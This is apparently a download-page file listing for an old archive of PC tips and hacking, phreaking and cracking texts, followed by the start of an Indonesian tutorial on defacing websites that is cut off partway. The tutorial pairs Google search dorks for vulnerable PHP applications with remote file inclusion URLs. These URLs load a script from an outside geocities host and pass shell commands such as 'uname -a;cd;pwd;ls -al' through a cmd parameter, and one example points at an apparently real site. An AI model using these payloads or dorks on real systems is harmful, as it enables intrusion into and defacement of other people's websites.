    How To Rename Multiple Files In Winxp.txt 0.56 kB
    How To Restrict Login Hours Allowed.txt 0.58 kB
    How to safeguard your files when computer crashes.txt 2.94 kB
    How to save Windows xp updates.txt 0.63 kB
    how to search google for RAPIDSHARE links.txt 0.98 kB
    How To See Hidden Files, Using Dos.txt 0.08 kB
    How To Set search For All Files In Winxp.txt 0.71 kB
    How to set up a http server running from you computer.txt 3.06 kB
    How To Set Up A Proxy In Flashget, As Requested.txt 0.66 kB
    How to set up a server with Apache , PHP , MySQL , Perl , phpMyAdmin.txt 8.77 kB
    How To Set Up Direct Connect.txt 26.96 kB
    HOW TO SET UP FTP SERVER.txt 1.79 kB
    How To Set Up Proxies In Your Browser.txt 1.63 kB
    How To Set Zone Alarm Settings!, Fix for ZA ports.txt 2.12 kB
    How To Setup Your Own Dns (Domain Name Server).txt 6.97 kB
    How To Speed Up A Slow Computer.txt 1.21 kB
    How To Speed Up Http Requests On Internet Explorer, as above.txt 1.28 kB
    How To Stop Spam.txt 8.05 kB
    How to swear in all languages.txt 28.32 kB
    How To Unload Cached Dll Files To Free Memory.txt 0.56 kB
    How to Use and How to Chain Multiple Proxies!.txt 9.70 kB
    How To Use File Compression In Windows Xp.txt 4.19 kB
    How To Use Google To Download Mp3%27s, and applications.....txt 0.60 kB
    How To Use Newsgroups.txt 0.56 kB
    How To Use You Gmail With Msn Messenger.txt 0.37 kB
    How-to Get Videos And Dvds Onto Your Sony PlayStation Portable (PSP) for free.txt 12.91 kB
    HOWTO Change Windows XP Home to Windows XP Pro.txt 1.67 kB
    Important Faqs For Sp2.txt 9.47 kB
    Improve Doom 3%27s Performances!!, simple but efficient trick for every1.txt 4.22 kB
    Improve your dialup modem preformance.txt 0.73 kB
    Increase XP Folder Settings.txt 0.79 kB
    Insert Your Serial For Office 2k, auto install office.txt 1.06 kB
    Install A New Hard-disk.txt 5.16 kB
    Install Xp From Dos.txt 0.84 kB
    Installing Apache on Windows.txt 6.29 kB
    Installing Gentoo Linux, Amazing step by step tutoria.txt 0.19 kB
    Installing IIS On Windows Xp Pro.txt 3.04 kB
    Installing Slackware Linux.txt 34.73 kB
    Instructions For Removal Of Advertising In Msn Messenger.txt 2.59 kB
    Ip Address Structure, Expilinatin OF IP Address {A short way}.txt 7.65 kB
    Irc How To Downlaod From, How to downlaod from IRC.txt 3.95 kB
    Irc Servers On nix, For people who want to start own IRC net.txt 0.48 kB
    Keep Files Private.txt 1.51 kB
    Keep Folders Hidden.txt 0.46 kB
    Keyboard Shortcuts Result in Excel 2000 - Movement.txt 1.57 kB
    Keyboard Shortcuts, Microsoft Word.txt 2.37 kB
    Keyboard Shortcuts, must read.txt 3.72 kB
    Kill Microsoft Instant Messenger.txt 0.28 kB
    Lamination Tips, Its a Fast TUT......txt 1.98 kB
    Leet Way To Get Your Ip In Windows Xp.txt 0.26 kB
    Linking Your Xbox To Your Computer.txt 33.52 kB
    Linux Howto%27s.txt 0.08 kB
    List Of Sites Not To Go To.txt 4.32 kB
    Little help for anonymous mailer.txt 1.56 kB
    Lots Of Windows Xp Tips, Take A Look !.txt 12.43 kB
    Lyrics With Google.txt 0.08 kB
    Make A Autorun File For Ur Cd.txt 0.66 kB
    Make A Batch File To Clean UR PC!!, All In One!!.txt 1.37 kB
    Make A Roughly 16 Hour Video Dvd.txt 1.01 kB
    Make Acrobat Reader 6 load faster.txt 0.42 kB
    Make Dvd Iso From Suse 9.2 5 Cds Iso, Linux mode and Windows mode ISO creation.txt 7.41 kB
    Make Mp3 Files Smaller Without Losing Quality.txt 0.73 kB
    Make Your Own Ringtones For Mobile Phone, also logos, wallpaper, etc.txt 3.00 kB
    Make Your Pc Faster, Guaranteed.txt 6.23 kB
    MakeXPgoFaster.txt 5.74 kB
    making a .cue file, in notepad.txt 0.53 kB
    Making A .txt Executable Server.txt 1.60 kB
    Making Bootable Floppy Disk to Boot into Windows.txt 4.82 kB
    Making Cd Version Of Doom3 Into Dvd Version.txt 0.75 kB
    Making Web Page Fonts Consistent and Uniform.txt 0.80 kB
    Manage Saved Ie Passwords.txt 0.75 kB
    Mastering The Windows XP Registry.txt 5.79 kB
    Maximize Dial-up Modem Settings.txt 2.31 kB
    Microsoft%27s Really Hidden Files, Reveled Hidden files.txt 33.95 kB
    mIRC Not Just Another Chat Client, Download Anything You Want Almost.txt 4.37 kB
    mIRCcommands.txt 10.10 kB
    Misc Linux Tips and Tricks.txt 18.55 kB
    Missing Administrator Account.txt 0.52 kB
    Mobile Secret Codes.txt 31.09 kB
    Modify .exe Files And ***** A Program.txt 3.06 kB
    More Hacking/A beginners guide to Hacking UNIX.txt 5.61 kB
    More Hacking/A *****ing Tutorial/C101-90.000 3.85 kB
    More Hacking/A *****ing Tutorial/C101-90.001 32.32 kB
    More Hacking/A *****ing Tutorial/C101-90.002 30.93 kB
    More Hacking/A *****ing Tutorial/C101-90.003 14.75 kB
    More Hacking/A *****ing Tutorial/C101-90.004 54.91 kB
    More Hacking/A *****ing Tutorial/ED!SON.NFO 1.58 kB
    More Hacking/A Guide to Internet Security- Becoming an Ueber*****er.txt 8.56 kB
    More Hacking/A Guide to the Easiest Hacking there is.txt 4.58 kB
    More Hacking/A List Of Some OF The Most Useful UNIX Hacking Commands.htm 23.03 kB
    More Hacking/A Small Guide to Hacking HOTMAIL.txt 3.02 kB
    More Hacking/A UNIX Hacking Tutorial.txt 82.20 kB
    More Hacking/Almost Everything You Ever Wanted To Know About Security (but.txt 47.52 kB
    More Hacking/An Indepth Guide in Hacking UNIX and the concept of Basic Net.txt 40.84 kB
    More Hacking/An Introduction to Denial of Service.txt 44.78 kB
    More Hacking/An Introduction to the Computer Underground.txt 17.03 kB
    More Hacking/Basic Networking.txt 14.04 kB
    More Hacking/BBS Crashing Techniques.txt 3.72 kB
    More Hacking/BRUTE- A brute force approach to hacking Unix passwords.txt 3.31 kB
    More Hacking/Closing the Net.txt 30.69 kB
    More Hacking/Compression and *****s for Dummies.txt 52.75 kB
    More Hacking/Computer Bulliten Boards and the Law.txt 56.06 kB
    More Hacking/Computer Chrime - Current Practices, Problems and Proposed So.txt 96.53 kB
    More Hacking/Computer eMail and Privacy.txt 19.18 kB
    More Hacking/Computer Hackers News Articles.txt 5.89 kB
    More Hacking/Computer Rights vs First and Forth Amentment Right.txt 44.24 kB
    More Hacking/Computer Security.txt 63.52 kB
    More Hacking/Computer Security_2.txt 51.94 kB
    More Hacking/Computer Viruii.txt 19.98 kB
    More Hacking/Computerized Governmental Database Systems Containing Persona.txt 40.34 kB
    More Hacking/COPS and Robbers-Unix System Security.txt 35.18 kB
    More Hacking/Copyright Guides for Photographers.txt 17.02 kB
    More Hacking/Crash Course in X Windows Security.txt 12.45 kB
    More Hacking/Crime and Puzzlement.txt 62.34 kB
    More Hacking/Cultural Formations in Text-Based Virtual Realties.txt 257.27 kB
    More Hacking/Cyberspace and the Legal Matrix- Laws or Confusion.txt 20.53 kB
    More Hacking/Dark Angel%27s Phunky Virus Writing Guide .txt 18.90 kB
    More Hacking/Defamation Liability of Computerized Bulliten Board Operators.txt 101.36 kB
    More Hacking/Dept of Treasury Letter.txt 11.25 kB
    More Hacking/Electronic Bulliten Boards and %27Public Goods%27 Explainations o.txt 45.84 kB
    More Hacking/Electropolos - Communication and Comunity on IRC.txt 112.45 kB
    More Hacking/Ethload User%27s Guide.txt 81.28 kB
    More Hacking/Formulating A Company Policy on Access to and Use and Disclos.txt 12.14 kB
    More Hacking/Free Speech in Cyberspace.txt 244.25 kB
    More Hacking/Gender Issues in Online Communications.txt 24.86 kB
    More Hacking/Government Computer Security Techniques.txt 7.88 kB
    More Hacking/HACKDICT.TXT 272.00 kB
    More Hacking/Hacker Test.txt 20.84 kB
    More Hacking/Hackers A-Z.TXT 256.00 kB
    More Hacking/Hackers Who Break into Computer Systems.txt 57.40 kB
    More Hacking/Hacking Bank Of America%27s Home Banking System.txt 5.79 kB
    More Hacking/Hacking Compuserve Infomation Service.txt 7.43 kB
    More Hacking/Hacking Faq.txt 42.06 kB
    More Hacking/Hacking GTE Telemail.txt 19.12 kB
    More Hacking/Hacking IRC - The Definitive Guide.txt 13.72 kB
    More Hacking/Hacking PC-Pursuit Codes.txt 8.10 kB
    More Hacking/Hacking Techniques.txt 8.52 kB
    More Hacking/Hacking TRW.txt 2.58 kB
    More Hacking/Hacking TYMNET.txt 5.79 kB
    More Hacking/Hacking Unix System V%27s.txt 10.93 kB
    More Hacking/Hacking Wal-Mart Computers.txt 4.09 kB
    More Hacking/Hacking Webpages.txt 3.90 kB
    More Hacking/How the Traditional Media Clasifications Fail to Protect in t.txt 40.50 kB
    More Hacking/How to crash AOL.txt 4.75 kB
    More Hacking/How to dial out of a UNIX System.txt 3.49 kB
    More Hacking/How to find Security Holes.txt 15.99 kB
    More Hacking/How to get a Shell in 24 hours.txt 7.98 kB
    More Hacking/How to Hack UNIX System V.txt 10.93 kB
    More Hacking/How to login to a C.B.I. System.txt 3.00 kB
    More Hacking/How to send ICQ Bombs.txt 2.33 kB
    More Hacking/Information of Hacking AngelFire Websites.txt 3.21 kB
    More Hacking/Introduction to Denail of Service.txt 44.78 kB
    More Hacking/IP addressing, and gaining IP%27s.txt 13.70 kB
    More Hacking/IP Addressing.txt 13.70 kB
    More Hacking/ISSN Numbers- An Introduction.txt 5.96 kB
    More Hacking/Junk Mail- How Did They All Get My Address.txt 12.70 kB
    More Hacking/LENROS~1.TXT 184.58 kB
    More Hacking/LENROS~2.TXT 7.41 kB
    More Hacking/MEMETICS.TXT 45.79 kB
    More Hacking/MINDVOX.TXT 64.57 kB
    More Hacking/MORRIS~1.TXT 31.18 kB
    More Hacking/NEIDOR~1.TXT 41.02 kB
    More Hacking/NFS Tracing.txt 34.20 kB
    More Hacking/Nightline- FBI,Privacy,and Proposed Wire-Tapping Legislation.txt 20.86 kB
    More Hacking/NY_2%27S Guide to Obtaining An IP Address. .doc 10.50 kB
    More Hacking/Organizational Analysis in Computer Science.txt 65.00 kB
    More Hacking/PGP Startup Guide.htm 26.00 kB
    More Hacking/Presumed Guilty.txt 153.76 kB
    More Hacking/Raising Hell with Unix.txt 12.91 kB
    More Hacking/Remarks of the President and Vice President to Silicon Valley.txt 37.70 kB
    More Hacking/RIGGSB~1.TXT 54.03 kB
    More Hacking/RIGGS_~1.TXT 54.03 kB
    More Hacking/RIGHTS~1.TXT 7.99 kB
    More Hacking/RIVERA.TXT 26.43 kB
    More Hacking/Security holes.txt 11.77 kB
    More Hacking/Seisure Warrent Documents for Ripco BBS.txt 72.01 kB
    More Hacking/Site Security Handbook.txt 247.43 kB
    More Hacking/SJ-DEC~1.TXT 45.03 kB
    More Hacking/SJ-RESP.TXT 69.59 kB
    More Hacking/SMTP-Simple Mail Transfer Protocol.txt 117.61 kB
    More Hacking/Summary of FBI Computer Systems.txt 5.07 kB
    More Hacking/SUNDEVIL.TXT 100.17 kB
    More Hacking/SUPREM~1.TXT 56.70 kB
    More Hacking/TCP packet fragment attacks against firewalls and filters.txt 4.39 kB
    More Hacking/Telenet-The Secret Exposed.txt 9.91 kB
    More Hacking/The Basics of Hacking- Introduction.txt 24.82 kB
    More Hacking/The Baudy World of the Byte Bandit-A Postmodernist Interpreta.txt 85.17 kB
    More Hacking/The Constitution in Cyberspace.txt 46.60 kB
    More Hacking/The *****ing Manual.txt 86.38 kB
    More Hacking/The Electronic Communication Privacy Act of 1986 - A Laymans .txt 10.04 kB
    More Hacking/The Greatest Hacker of all time.ASC 25.02 kB
    More Hacking/The Hacker%27s League.txt 12.37 kB
    More Hacking/The Inner Circle Book%27s Hacking Techniques.txt 1.96 kB
    More Hacking/The Lamahs-Guide to Pirating Software on the Internet.txt 12.21 kB
    More Hacking/The M.M.C. Guide to Hacking, Phreaking, Carding.txt 19.11 kB
    More Hacking/The National Information Infrastructure-Agenda for Action.txt 96.49 kB
    More Hacking/The Newbies Handbook- %27 How to beging in the World of Hacking.txt 43.83 kB
    More Hacking/The Newbies-User%27s Guide to Hacking.txt 47.35 kB
    More Hacking/The Pre-History of Cyberspace.txt 60.25 kB
    More Hacking/The Price of Copyright Violation.txt 73.11 kB
    More Hacking/The REAL way to hack RemoteAccess.txt 12.12 kB
    More Hacking/The Secret Service, UUCP,and The Legion of Doom.txt 19.63 kB
    More Hacking/the UNIX operating system (Berkley 4.2).txt 13.55 kB
    More Hacking/Theft of Computer Software-A National Security Threat.txt 12.22 kB
    More Hacking/Thoughts on the National Research and Education Network.txt 19.72 kB
    More Hacking/Tips on Starting Your Own BBS.1 8.04 kB
    More Hacking/undocumented DOS commands.txt 23.17 kB
    More Hacking/UNIX Computer Security Checklist.0 49.34 kB
    More Hacking/UNIX Use and Security - By the Prophet.txt 153.74 kB
    More Hacking/UNIX Use and Security From The Ground Up.htm 135.60 kB
    More Hacking/UNIX- A Hacking Tutorial.SIR 82.26 kB
    More Hacking/Viruii FAQ.txt 4.07 kB
    More Hacking/Virus-Trojan FAQ.txt 1.95 kB
    More Hacking/What Files are Legal for Distribution on a BBS.txt 20.83 kB
    More Hacking/What To Look For In A Code Hacking Program.htm 5.56 kB
    More Hacking/What To Look For In A Code Hacking Program.txt 5.46 kB
    More Hacking/What You Should Know About Computer Viruses.DNA 16.91 kB
    More Xp Tips and tricks make your computer more faster.txt 46.14 kB
    Moving and Removing the Start Button.txt 0.66 kB
    Msn Messenger and Gmail.txt 3.69 kB
    My Flash Bookmarks, long list of tutorials.txt 2.98 kB
    Myth about WPA ( How it is done ), Windows Product Activation Technique.txt 45.54 kB
    Nero How To Verify The Validity Of The Sn U Use.txt 0.88 kB
    New Hacking Ebooks/A Basic UNIX Overview.rtf 22.46 kB
    New Hacking Ebooks/A BEGINNERS GUIDE TO Hacking Unix.txt 6.05 kB
    New Hacking Ebooks/A Novice%27s Guide to Hacking 2004.txt 40.75 kB
    New Hacking Ebooks/A Novice%27s Guide To Hacking.txt 8.58 kB
    New Hacking Ebooks/A Short HACKER SPEAK Glossary.txt 9.78 kB
    New Hacking Ebooks/A simple TCP spoofing attack.txt 14.60 kB
    New Hacking Ebooks/Accessing the bindery files directly.txt 3.97 kB
    New Hacking Ebooks/An Architectural Overview of UNIX Network Security.htm 53.27 kB
    New Hacking Ebooks/Anonymity complete GUIDE.rtf 28.90 kB
    New Hacking Ebooks/ANONYMOUS emails.txt 3.15 kB
    New Hacking Ebooks/Anonymous FTP FAQ.htm 28.14 kB
    New Hacking Ebooks/ANSIBombs II Tips And Techniques.txt 10.05 kB
    New Hacking Ebooks/attacks on networks how to stop.htm 67.77 kB
    New Hacking Ebooks/Backdoor.txt 18.71 kB
    New Hacking Ebooks/Backdoors.txt 19.15 kB
    New Hacking Ebooks/BBS CRASHING TECHNIQUES.txt 3.72 kB
    New Hacking Ebooks/Bust Avoidance For ~censored~.txt 5.82 kB
    New Hacking Ebooks/Firewall Protection how to.rtf 33.12 kB
    New Hacking Ebooks/Guide to Hacking with sub7.doc 106.00 kB
    New Hacking Ebooks/hacking and phreaking.doc 168.00 kB
    New Hacking Ebooks/Hacking for Dummies Volume 2.doc 147.00 kB
    New Hacking Ebooks/Hacking For Newbies.doc 54.00 kB
    New Hacking Ebooks/hacking in telnet ftp.rtf 57.47 kB
    New Hacking Ebooks/hacking on Telnet explained.doc 16.25 kB
    New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 1.doc 4.58 kB
    New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 2.doc 8.25 kB
    New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 3.doc 4.51 kB
    New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 4.doc 0.00 kB
    New Hacking Ebooks/Hacking On XP 1-5/hacking on XP part 5.doc 0.00 kB
    New Hacking Ebooks/hacking password protected site.doc 26.50 kB
    New Hacking Ebooks/Hacking Password Protected Website%27s.doc 3.06 kB
    New Hacking Ebooks/hacking passwords.doc 26.50 kB
    New Hacking Ebooks/How to learn to hack in easy steps.doc 100.00 kB
    New Hacking Ebooks/How to use the Web to look up information on hacking.doc 16.28 kB
    New Hacking Ebooks/IP how to.rtf 5.15 kB
    New Hacking Ebooks/NetBios explained.doc 26.68 kB
    New Hacking Ebooks/Proxy how to.rtf 3.13 kB
    New Hacking Ebooks/Routing Basics.pdf 30.25 kB
    New Hacking Ebooks/telnet trick port 25.doc 1.76 kB
    New Hacking Ebooks/Yahoo Chat Commands how to.rtf 0.93 kB
    New Pc Or New Motherboard.txt 3.77 kB
    New Way To Relive Some Zinio File.txt 1.95 kB
    news groups the how to do.txt 11.40 kB
    Nice list of windows shortcuts.txt 7.50 kB
    No Text Icons.txt 0.29 kB
    Ntfs Cluster Size, better harddrive performance.txt 1.34 kB
    Official Unattended Xp Cd Guide Xp Sp2 @ Msfn.org.txt 0.91 kB
    Open Windows Explorer To A Different Default Direc.txt 0.74 kB
    Optimize Broadband and Dsl Connections.txt 1.91 kB
    Optimize Emule Connection.txt 1.20 kB
    Outpost Rules, Outpost rules for system and app.txt 7.32 kB
    Outsmarting System File Protection.txt 5.37 kB
    Overclocking_Tutorial.txt 7.67 kB
    Packet Attacks - Version 1.1, { Packet_Attack_Exlained}.txt 25.94 kB
    Part 0 Dc++.txt 4.11 kB
    Part 1 Bittorrents.txt 4.19 kB
    Part 2 Irc (mirc).txt 4.91 kB
    Part 3 Ftp.txt 2.71 kB
    Partitioning Your Harddisk With Fdisk.txt 2.13 kB
    Pc File Extention Listing.txt 26.48 kB
    Pc Maintenance Guide.txt 10.20 kB
    Peer2mail Tutorial.txt 9.37 kB
    Performance Increase Through My Computer.txt 0.53 kB
    Phreaking/2600 Hertz Single Tone Generator Schematic.txt 1.95 kB
    Phreaking/A List of every TeleNet code that there is.txt 1.96 kB
    Phreaking/A List Of Government BBS Numbers.txt 13.07 kB
    Phreaking/An Extensive Guide to Bell System Man Holes.txt 10.10 kB
    Phreaking/An Introduction into TeleScan.txt 3.98 kB
    Phreaking/An Introductory Guide To TeleNet Commands.txt 2.20 kB
    Phreaking/Area Codes and Time Zones.txt 4.90 kB
    Phreaking/Becoming A Phreaker - The Quick n%27 Easy Way.txt 17.09 kB
    Phreaking/Bell Hell Volume #1.txt 10.29 kB
    Phreaking/Bell Hell Volume #2.txt 15.92 kB
    Phreaking/Breaker B0X.txt 1.96 kB
    Phreaking/busybox.txt 1.61 kB
    Phreaking/Cellular Listening with a TV .txt 1.96 kB
    Phreaking/Cellular Telephone Phreaking Phile Series VOL 1.txt 10.00 kB
    Phreaking/Drake%27s Phreaking Tutorial.txt 3.34 kB
    Phreaking/Hacking VoiceMail Systems.txt 25.89 kB
    Phreaking/How BT phone cards works.txt 4.18 kB
    Phreaking/How Phone Phreaks are Caught.txt 12.00 kB
    Phreaking/How to Bill All Of your Fone Calls To Some Poor, Unsuspecting.txt 11.38 kB
    Phreaking/How to make a Free Phone Call.txt 2.16 kB
    Phreaking/How to Put an End to Unwanted or Harassing Phone Calls.HAR 12.10 kB
    Phreaking/Phone Systems Tutorial by The Jolly Roger.txt 8.68 kB
    Phreaking/Phreakers Handbook.txt 9.83 kB
    Phreaking/Quick Phone Modifications.txt 4.12 kB
    Phreaking/The ABC%27s of Payphones part 1.txt 2.58 kB
    Phreaking/The ABC%27s of Payphones part 2.txt 2.12 kB
    Phreaking/The ABC%27s of Payphones part 3.txt 2.21 kB
    Phreaking/The ABC%27s of Payphones part 4.txt 2.64 kB
    Phreaking/ThE Beige BoX .txt 6.23 kB
    Phreaking/The History of British Phreaking.htm 8.29 kB
    Phreaking/The M.M.C. Guide to Hacking, Phreaking, Carding.txt 19.11 kB
    Phreaking/The Moterola Bible.txt 116.99 kB
    Phreaking/The Myth of the 2600Hz Detector .txt 6.55 kB
    Phreaking/The Official Phreaker%27s Manual.txt 499.25 kB
    Phreaking/The Phreakers Handbook-1.txt 62.87 kB
    Phreaking/The Telephone Works.txt 9.25 kB
    Phreaking/The Ultimate Phreaking Guide .txt 1.96 kB
    Phreaking/Understanding the Telephone System.txt 16.34 kB
    Phreaking/Zen and the Art of Fone Phreaking `97 .txt 66.74 kB
    Play Games On PS2 Without ModChip.txt 5.37 kB
    Play On A Bnet Emulator, and f off cd key check =).txt 1.81 kB
    Port Numbers.txt 40.19 kB
    Problem With Internet Navigation, Clean Host File.txt 0.47 kB
    Quick Fix For Spyware, Try This Before Doing Surgery on Your OS.txt 1.77 kB
    Quick Msc.txt 0.50 kB
    Quick Shutdown for XP, How to create a shutdown shortcut..txt 0.54 kB
    Quickly Start The Shared Folder Wizard.txt 0.40 kB
    Rapidshare hack!!!!! Free premium acount for all.txt 3.08 kB
    Rapidshare Hacked, unlimited upload, no countdown.txt 1.72 kB
    Rapidshare Timelimit.txt 0.98 kB
    Read This! Av Compare!.txt 7.56 kB
    Recover A Corrupted System File.txt 1.10 kB
    Recover a Quick erased CD RW.txt 3.89 kB
    ReformatandReinstall.txt 2.58 kB
    Regedit.exe and Regedt32.exe, Whats the difference.txt 2.87 kB
    Registry Disassembled a basic tutorial.txt 7.10 kB
    Reinstall Internet Explorer 6.txt 1.13 kB
    Release Codes, Read, and Learn....txt 2.29 kB
    Remote Desktop Through Company Firewall.txt 2.59 kB
    Remote Shutdown.txt 1.22 kB
    Remove Linux From Your Pc Safely, ...and restoring your MBR.txt 1.66 kB
    Remove Msn Messenger From Xp, several ways...txt 4.99 kB
    Removing Banners From Free Webhosts.txt 2.69 kB
    Removing Norton Anti-virus 2004, How to remove the Registry Enteries.txt 0.97 kB
    Rename %27recycle Bin%27 To Whatever You Want.txt 0.66 kB
    Reregister All .dll Files Within Registry.txt 1.54 kB
    Reset your lost Bios Password.txt 4.24 kB
    Restore JPG,JPEG,JPE Default File associations, Win XP Tweak.txt 1.28 kB
    REVERSE CODING.txt 15.11 kB
    Run Aol Without Using Aol Browser and Save Resources, connect permanently and use any browser.txt 0.44 kB
    Running A Board forum From Your Own Pc.txt 2.32 kB
    Running Vanishing Console Programs With A Click!, Ever had a console program that vanis....txt 1.13 kB
    Safely Editing the Registry....txt 1.86 kB
    Save Your Desktop Icon Settings.txt 2.18 kB
    Saving and loading Photoshop actions.txt 1.79 kB
    Scheduled Tasks - Defrag, how to set up scheduled defrags.txt 1.92 kB
    ScreenLock Professional v2.0.41.txt 0.04 kB
    SEARCH eBOOK in FTP SEARCH ENGINE.txt 0.43 kB
    Search For Ebook Server With Google.com.txt 0.35 kB
    Search like a real warez d00dz, for warez of course!.txt 0.57 kB
    Searching For Something To Download, This may help.txt 0.34 kB
    Secret Backdoor To Many Websites.txt 2.09 kB
    Secrets Of Lock Picking.txt 53.74 kB
    Securing WinXP Pro (with what win-xp has to offer.txt 9.60 kB
    Securing your WINDOWS XP computer.txt 1.19 kB
    Set Google as your Default Search in IE.txt 0.55 kB
    Set Win Explorer to open the folder you want!, Little trick.txt 0.23 kB
    sick of inserting winxp cd every time your pc asks, Change Default Location of i386 Folder.txt 3.21 kB
    sidebar fix.txt 0.57 kB
    Simple Tweaks For Peak Pc Graphics Performance.txt 10.16 kB
    Single Click Shutdown.txt 2.82 kB
    Single-click To Open An Item..., IF the Folder Options is grayed out.txt 1.19 kB
    Slow Loggon Time, one fix for problem.txt 0.96 kB
    Slow Opening Of File Dialogs.txt 1.10 kB
    Some Cool Site For Tutorials.txt 0.41 kB
    Some Google Tricks, again.txt 1.74 kB
    Some More Tips To Improve Your Winxp.txt 24.09 kB
    Sp2 For Xp Slipstream, Integrate SP2 into your XP CD.txt 10.71 kB
    Sp2 Tweaks.txt 3.44 kB
    Speed Up Internet.txt 4.46 kB
    Speed up menu display.txt 0.54 kB
    Speed up Mozilla FireFox.txt 0.45 kB
    Speed Up Your Bandwidth By 20% !, Windows uses 20% of your bandwidth.txt 1.02 kB
    Speeding up menus in XP.txt 0.27 kB
    Speeding up your internet connection under Linux and Windows.html 11.75 kB
    Spoofing emails, via telenet.txt 0.41 kB
    Standard ASCII Character Set.txt 1.79 kB
    Steps to Clean Install XP.txt 8.23 kB
    Stop A Restart Process In 3steps.txt 0.29 kB
    Stop Annoying Pop-ups Without Pop-up Blockersoutli.txt 1.23 kB
    System Changes To Foil Hackers And Browser Hijacke.txt 7.65 kB
    System File Checker For Windows Xp.txt 2.26 kB
    Tcpip A Mammoth Description, Short and easy-Everything U want to know.txt 50.96 kB
    Testing Wattage Consumption Of Your Computer, Measuring your computer%27s wattage.txt 9.33 kB
    The Antivirus Defense-in-Depth Guide.txt 2.77 kB
    The difference between DVD-R, DVD+R, DVD+RW and DVD-RW.txt 3.69 kB
    The Modern Phreakers Guide To Beige Boxing.txt 4.32 kB
    The Modern Phreakers Guide To Payphones.txt 6.98 kB
    The Port Guide, Port number and info.txt 24.64 kB
    The Ultimate Guide To Installing Windows Xp Sp2.txt 3.14 kB
    Three Ways Of Bypass Starforce Cd Protection.txt 2.48 kB
    Tip for shutdown windows - virus.txt 0.39 kB
    Tips And Tricks, Windows XP.txt 41.24 kB
    Tired Of Reinstalling Windows.txt 2.31 kB
    To Get And Show The Ip Via javascript.txt 0.62 kB
    Top 5 Myths About Safe Surfing, PC Magazine.txt 3.36 kB
    Transferring Data.txt 6.45 kB
    Translating Binary To Text.txt 6.22 kB
    Translating Binary to Text2.txt 5.72 kB
    Trojan Ports.txt 13.83 kB
    Turn MSN Messenger Display Pix into User Pix on XP.txt 2.50 kB
    Turn Off Unneeded Services, speed up pc.txt 1.56 kB
    Tutorial Get the serial number you need.txt 0.88 kB
    Tutorial How to create a bootable Windows XP SP1 CD (Nero).txt 2.17 kB
    Tutorials - blacksun.box.sk/coding/Base Number Systems.html 7.78 kB
    Tutorials - blacksun.box.sk/coding/BASIC C Socket Programming In Unix For Newbies.txt 21.50 kB
    Tutorials - blacksun.box.sk/coding/Basics of am 3mp33j3w.txt 18.64 kB
    Tutorials - blacksun.box.sk/coding/Batch File Programming.txt 41.70 kB
    Tutorials - blacksun.box.sk/coding/BOOLEAN LOGIC GATES.html 14.04 kB
    Tutorials - blacksun.box.sk/coding/C++ Tutorial By Clayman.html 23.77 kB
    Tutorials - blacksun.box.sk/coding/Creating A Simple Hit Counter In PHP.html 8.77 kB
    Tutorials - blacksun.box.sk/coding/Creating A Simple Search Engine In PHP.html 9.62 kB
    Where Is Winipcfg In Winxp.txt 0.62 kB
    Who%27s Seeding The Net With Spyware.txt 5.33 kB
    Why wait 35 Seconds at eZshare.txt 1.55 kB
    Win 2000 Dr. Watsson.txt 0.23 kB
    Windows 2000 Tips and Tricks.txt 4.58 kB
    Windows 2003 System Restore, How to activate system restore in W2K3.txt 5.47 kB
    Windows Scan Count Down Time.txt 0.54 kB
    Windows Shortcuts.txt 12.84 kB
    WINDOWS TRUE HIDDEN FILES.txt 9.46 kB
    Windows Tweak, Hack Your Start Button.txt 3.25 kB
    Windows Xp - Speed Up Your Network and Internet Access.txt 2.70 kB
    WINDOWS XP HIDDEN APPS.txt 2.59 kB
    Windows XP Registry Tweaks.txt 34.05 kB
    Windows XP Startup and Performance Tweaks.txt 1.76 kB
    Windows Xp Tips %27n%27 Tricks.txt 28.51 kB
    Windows Xp Tweaks, A work in progress.txt 2.98 kB
    Windows XP Tweaks.txt 2.37 kB
    WinRar Tutorial - Compression profiles, passwords and more.txt 5.78 kB
    Winsock 2 Repair.txt 2.10 kB
    WinXP 3 Tips.txt 1.87 kB
    Winxp Application Defrag, faster access for used programs.txt 0.30 kB
    Winxp Applications Startup Time, Decrease your Applications startup time.txt 1.16 kB
    WinXP Bootable CD.txt 2.19 kB
    Winxp System Response, reboot whitout rebooting.txt 0.61 kB
    Winxp Tips And Tricks, Winsock 2 repair.txt 2.19 kB
    Xp Auto Install.txt 1.79 kB
    Xp Folder View Does Not Stay To You%27re Setting., Grab your registry editor and join in.txt 1.87 kB
    XP REPAIR INSTALL.txt 5.92 kB
    XP Tweaking.txt 15.75 kB
    Yahoo + geocities Posts.txt 3.07 kB
    Yahoo Messeger, no ad%27s.txt 0.83 kB
    You Want Lots Of Music, Appz, Anything, Try Dex Hunting.txt 1.47 kB
    Your Home Page Nevr Being Changed.txt 0.50 kB
    Your Own Home Server - Introduction.txt 11.25 kB
    Download file:**HotFile**


    Tutorial Deface Web Untuk Pemula





    Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..


    cd namadirectory = Melihat Suatu directory
    ls -al = Melihat Suatu Directory Lebih Dalam lagi
    fined = Mengecek Directory directory
    cat = Membaca Suatu Berkas
    wget = MengUpload suatu Files
    tar -zxvf = MengExtraxt suatu files yang berbentuk
    tgz
    pwd = Mengetahui Di Directory mana Kita Berada
    uname -a = Keberadaan Path berada
    w = Mengetahui Siapa Saja yang telah menggunakan Shell.

    Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

    - Oneadmin

    Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:.net
    nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

    Contoh :
    http://target.com/oneadmin/config.php?path[docroot]=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

    - PnPhpBB2

    Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki...

    nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

    Contoh :
    http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname%20-a;cd;pwd

    - Support Ticket

    Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki...
